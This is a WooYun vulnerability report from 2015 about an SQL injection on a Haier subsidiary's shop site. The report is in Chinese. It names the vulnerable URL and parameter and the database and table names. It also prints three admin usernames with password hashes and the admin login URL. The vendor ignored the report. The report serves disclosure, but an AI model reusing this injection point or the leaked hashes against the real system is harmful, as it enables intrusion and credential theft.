当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136277

漏洞标题:海尔集团某站SQL注入漏洞

相关厂商:海尔集团

漏洞作者: M4sk

提交时间:2015-08-24 18:49

修复时间:2015-08-29 18:50

公开时间:2015-08-29 18:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

http://www.hswzyj.com/shop/mobile/hdzqde.php?id=160 ©2013 青岛海尔施特劳斯水设备有限公司 版权所有

Target: 		http://www.hswzyj.com/shop/mobile/hdzqde.php?id=160
Host IP:		223.6.248.180
Powered-by: 	PHP/5.3.29
DB Server: 	MySQL >=5
Resp. Time(avg):	96 ms
Current User: 	haier@10.168.25.55:20635
Sql Version: 	5.5.18.1-log
Current DB: 	shitelaoshi
System User: 	haier@10.168.25.55:20647
DB User: 	'haier'@'%'
Data Bases: 	information_schema
		mysql
		performance_schema
		shitelaoshi
		stls_lt
		stls_shop
		watermaker


shitelaoshi
Table Name	Columns
yanyu_address	
yanyu_admin	
yanyu_admin_panel	
yanyu_admin_role	
yanyu_admin_role_priv	
yanyu_announce	
yanyu_attachment	
yanyu_attachment_index	
yanyu_badword	
yanyu_block	
yanyu_block_history	
yanyu_block_priv	
yanyu_cache	
yanyu_category	
yanyu_category_priv	
yanyu_collection_content	
yanyu_collection_history	
yanyu_collection_node	
yanyu_collection_program	
yanyu_comment	
yanyu_comment_check	
yanyu_comment_data_1	
yanyu_comment_setting	
yanyu_comment_table	
yanyu_content_check	
yanyu_copyfrom	
yanyu_datacall	
yanyu_dbsource	
yanyu_download	
yanyu_download_data	
yanyu_downservers	
yanyu_extend_setting	
yanyu_favorite	
yanyu_flashbanner	
yanyu_flashbanner_data	
yanyu_form_baoxiu	
yanyu_form_huodong	
yanyu_form_lianxi	
yanyu_form_lipinjuan	
yanyu_form_user_reg	
yanyu_form_wenti	
yanyu_goods	
yanyu_goods_data	
yanyu_hits	
yanyu_ipbanned	
yanyu_keylink	
yanyu_keyword	
yanyu_keyword_data	
yanyu_link	
yanyu_linkage	
yanyu_log	
yanyu_member	
yanyu_member_detail	
yanyu_member_group	
yanyu_member_menu	
yanyu_member_verify	
yanyu_member_vip	
yanyu_menu	
yanyu_message	
yanyu_message_data	
yanyu_message_group	
yanyu_model	
yanyu_model_field	
yanyu_module	
yanyu_mood	
yanyu_news	
yanyu_news_data	
yanyu_order_cart	
yanyu_order_content	
yanyu_order_logistics	
yanyu_page	
yanyu_pay_account	
yanyu_pay_payment	
yanyu_pay_spend	
yanyu_picture	
yanyu_picture_data	
yanyu_position	
yanyu_position_data	
yanyu_poster	
yanyu_poster_201401	
yanyu_poster_201402	
yanyu_poster_201407	
yanyu_poster_201408	
yanyu_poster_201412	
yanyu_poster_201501	
yanyu_poster_201502	
yanyu_poster_201503	
yanyu_poster_201504	
yanyu_poster_201505	
yanyu_poster_201506	
yanyu_poster_201507	
yanyu_poster_201508	
yanyu_poster_space	
yanyu_queue	
yanyu_release_point	
yanyu_search	
yanyu_search_keyword	
yanyu_session	
yanyu_shop	
yanyu_shop_data	
yanyu_site	
yanyu_sms_report	
yanyu_special	
yanyu_special_c_data	
yanyu_special_content	
yanyu_specifications	
yanyu_specifications_data	
yanyu_sphinx_counter	
yanyu_sso_admin	
yanyu_sso_applications	
yanyu_sso_members	
yanyu_sso_messagequeue	
yanyu_sso_session	
yanyu_sso_settings	
yanyu_tag	
yanyu_template_bak	
yanyu_times	
yanyu_type	
yanyu_urlrule	
yanyu_video	
yanyu_video_data	
yanyu_vote_data	
yanyu_vote_option	
yanyu_vote_subject	
yanyu_wangdian	
yanyu_wangdian_data	
yanyu_wap	
yanyu_wap_type


Data Base: shitelaoshi
Table: yanyu_admin
Total Rows: 3
userid username password
1 yanyu 79c8727efc9a2f6796e2ce7ef6456a4d
2 admin 4cbb1240471931aaa9799313074ceafb
4 stls 2c648f7ba5cfa09c2e71fdf59e7ca481
http://www.hswzyj.com/shop/admin/privilege.php?act=login
后天的地址
由于MD5没解开就不深入了
..

漏洞证明:

综上

修复方案:

你会的

版权声明:转载请注明来源 M4sk@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-29 18:50

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论